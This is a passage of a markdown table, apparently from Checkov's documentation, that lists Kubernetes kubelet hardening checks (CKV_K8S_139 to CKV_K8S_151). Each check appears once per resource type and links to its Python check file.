Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3361 | CKV_K8S_139 | resource | Deployment | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 
[KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3362 | CKV_K8S_139 | resource | DeploymentConfig | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3363 | CKV_K8S_139 | resource | Job | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3364 | CKV_K8S_139 | resource | Pod | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3365 | CKV_K8S_139 | resource | PodTemplate | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3366 | CKV_K8S_139 | resource | ReplicaSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3367 | CKV_K8S_139 | resource | ReplicationController | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 
[KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3368 | CKV_K8S_139 | resource | StatefulSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3369 | CKV_K8S_140 | resource | CronJob | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3370 | CKV_K8S_140 | resource | DaemonSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3371 | CKV_K8S_140 | resource | Deployment | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3372 | CKV_K8S_140 | resource | DeploymentConfig | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3373 | CKV_K8S_140 | resource | Job | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3374 | CKV_K8S_140 | resource | Pod | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | 
[KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3375 | CKV_K8S_140 | resource | PodTemplate | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3376 | CKV_K8S_140 | resource | ReplicaSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3377 | CKV_K8S_140 | resource | ReplicationController | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3378 | CKV_K8S_140 | resource | StatefulSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3379 | CKV_K8S_141 | resource | CronJob | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3380 | CKV_K8S_141 | resource | DaemonSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3381 | CKV_K8S_141 | resource | Deployment | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3382 | CKV_K8S_141 | resource | DeploymentConfig 
| Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3383 | CKV_K8S_141 | resource | Job | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3384 | CKV_K8S_141 | resource | Pod | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3385 | CKV_K8S_141 | resource | PodTemplate | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3386 | CKV_K8S_141 | resource | ReplicaSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3387 | CKV_K8S_141 | resource | ReplicationController | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3388 | CKV_K8S_141 | resource | StatefulSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3389 | CKV_K8S_143 | resource | CronJob | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | 
[KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3390 | CKV_K8S_143 | resource | DaemonSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3391 | CKV_K8S_143 | resource | Deployment | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3392 | CKV_K8S_143 | resource | DeploymentConfig | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3393 | CKV_K8S_143 | resource | Job | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3394 | CKV_K8S_143 | resource | Pod | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3395 | CKV_K8S_143 | resource | PodTemplate | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | 
[KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3396 | CKV_K8S_143 | resource | ReplicaSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3397 | CKV_K8S_143 | resource | ReplicationController | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3398 | CKV_K8S_143 | resource | StatefulSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3399 | CKV_K8S_144 | resource | CronJob | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3400 | CKV_K8S_144 | resource | DaemonSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3401 | CKV_K8S_144 | resource | Deployment | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 
3402 | CKV_K8S_144 | resource | DeploymentConfig | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3403 | CKV_K8S_144 | resource | Job | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3404 | CKV_K8S_144 | resource | Pod | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3405 | CKV_K8S_144 | resource | PodTemplate | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3406 | CKV_K8S_144 | resource | ReplicaSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3407 | CKV_K8S_144 | resource | ReplicationController | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3408 | CKV_K8S_144 | resource | StatefulSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | 
[KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3409 | CKV_K8S_145 | resource | CronJob | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3410 | CKV_K8S_145 | resource | DaemonSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3411 | CKV_K8S_145 | resource | Deployment | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3412 | CKV_K8S_145 | resource | DeploymentConfig | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3413 | CKV_K8S_145 | resource | Job | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3414 | CKV_K8S_145 | resource | Pod | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3415 | CKV_K8S_145 | resource | PodTemplate | Ensure that the --make-iptables-util-chains argument is 
set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3416 | CKV_K8S_145 | resource | ReplicaSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3417 | CKV_K8S_145 | resource | ReplicationController | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3418 | CKV_K8S_145 | resource | StatefulSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3419 | CKV_K8S_146 | resource | CronJob | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3420 | CKV_K8S_146 | resource | DaemonSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3421 | CKV_K8S_146 | resource | Deployment | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3422 | CKV_K8S_146 | resource | DeploymentConfig | Ensure that the --hostname-override argument is not set | Kubernetes | 
[KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3423 | CKV_K8S_146 | resource | Job | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3424 | CKV_K8S_146 | resource | Pod | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3425 | CKV_K8S_146 | resource | PodTemplate | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3426 | CKV_K8S_146 | resource | ReplicaSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3427 | CKV_K8S_146 | resource | ReplicationController | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3428 | CKV_K8S_146 | resource | StatefulSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3429 | CKV_K8S_147 | resource | CronJob | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | 
[KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3430 | CKV_K8S_147 | resource | DaemonSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3431 | CKV_K8S_147 | resource | Deployment | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3432 | CKV_K8S_147 | resource | DeploymentConfig | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3433 | CKV_K8S_147 | resource | Job | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3434 | CKV_K8S_147 | resource | Pod | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3435 | CKV_K8S_147 | resource | PodTemplate | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3436 | CKV_K8S_147 | resource | ReplicaSet | Ensure that the 
--event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3437 | CKV_K8S_147 | resource | ReplicationController | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3438 | CKV_K8S_147 | resource | StatefulSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3439 | CKV_K8S_148 | resource | CronJob | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3440 | CKV_K8S_148 | resource | DaemonSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3441 | CKV_K8S_148 | resource | Deployment | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3442 | CKV_K8S_148 | resource | DeploymentConfig | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | 
[KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3443 | CKV_K8S_148 | resource | Job | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3444 | CKV_K8S_148 | resource | Pod | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3445 | CKV_K8S_148 | resource | PodTemplate | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3446 | CKV_K8S_148 | resource | ReplicaSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3447 | CKV_K8S_148 | resource | ReplicationController | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3448 | CKV_K8S_148 | resource | StatefulSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | 
[KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3449 | CKV_K8S_149 | resource | CronJob | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3450 | CKV_K8S_149 | resource | DaemonSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3451 | CKV_K8S_149 | resource | Deployment | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3452 | CKV_K8S_149 | resource | DeploymentConfig | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3453 | CKV_K8S_149 | resource | Job | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3454 | CKV_K8S_149 | resource | Pod | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3455 | CKV_K8S_149 | resource | PodTemplate | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | 
[KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3456 | CKV_K8S_149 | resource | ReplicaSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3457 | CKV_K8S_149 | resource | ReplicationController | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3458 | CKV_K8S_149 | resource | StatefulSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3459 | CKV_K8S_151 | resource | CronJob | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
-| 3460 | CKV_K8S_151 | resource | DaemonSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
-| 3461 | CKV_K8S_151 | resource | Deployment | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
-| 3462 | CKV_K8S_151 | resource | DeploymentConfig | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | 
Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
-| 3463 | CKV_K8S_151 | resource | Job | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
-| 3464 | CKV_K8S_151 | resource | Pod | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
-| 3465 | CKV_K8S_151 | resource | PodTemplate | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
-| 3466 | CKV_K8S_151 | resource | ReplicaSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
-| 3467 | CKV_K8S_151 | resource | ReplicationController | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
